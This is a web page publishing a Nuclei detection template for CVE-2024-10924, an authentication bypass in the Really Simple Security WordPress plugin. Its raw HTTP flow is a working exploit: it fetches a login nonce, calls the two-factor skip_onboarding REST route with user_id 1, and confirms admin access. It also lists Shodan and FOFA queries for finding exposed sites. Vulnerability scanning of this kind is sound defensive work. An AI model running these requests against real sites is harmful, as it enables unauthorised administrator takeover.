Really Simple Security < 9.1.2 - Authentication Bypass
ID: CVE-2024-10924
Severity: critical
Author: yaser_s
Tags: cve,cve2024,wp,wp-plugin,wordpress,auth-bypass,really-simple-ssl
Description
Section titled “Description”The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the ‘check_login_and_get_user’ function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the “Two-Factor Authentication” setting is enabled (disabled by default).
YAML Source
Section titled “YAML Source”id: CVE-2024-10924
info: name: Really Simple Security < 9.1.2 - Authentication Bypass author: yaser_s severity: critical description: | The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default). remediation: Fixed in 9.1.2 reference: - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L277 - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L278 - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L67 - https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl - https://wpscan.com/vulnerability/8e1f4374-2e41-4c27-80d4-db172015c6be/ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d5d05ad-1a7a-43d2-bbbf-597e975446be?source=cve - https://nvd.nist.gov/vuln/detail/CVE-2024-10924 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-10924 cwe-id: CWE-288,CWE-306 epss-score: 0.00101 epss-percentile: 0.4287 cpe: cpe:2.3:a:really-simple-plugins:really_simple_security:*:*:*:*:-:wordpress:*:* metadata: verified: true max-request: 1 vendor: really-simple-plugins product: really_simple_security framework: wordpress shodan-query: html:"/wp-content/plugins/really-simple-ssl" fofa-query: body="/wp-content/plugins/really-simple-ssl" tags: cve,cve2024,wp,wp-plugin,wordpress,auth-bypass,really-simple-ssl
flow: http(1) && http(2) && http(3)
http: - raw: - | GET /wp-login.php HTTP/1.1 Host: {{Hostname}}
extractors: - type: regex name: nonce part: body_1 group: 1 regex: - '"nonce":"([a-z0-9]+)"\}' internal: true
- raw: - | POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{ "user_id": 1, "login_nonce": "{{nonce}}", "redirect_to": "/wp-admin/" }
matchers: - type: word part: body words: - '"redirect_to":"\/wp-admin\/"' internal: true
- raw: - | GET /wp-admin/profile.php HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - 'Personal Options'
- type: word part: content_type words: - 'text/html'# digest: 490a0046304402204abade2aba55b6eea42a22ccf1591c5d83ea31d23f9f492ab7347d8bba93aba00220193ab92d79c45b7af0695a5f7e846ac7ea1183dce997bc97b0647b1382c3aa8a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-10924.yaml"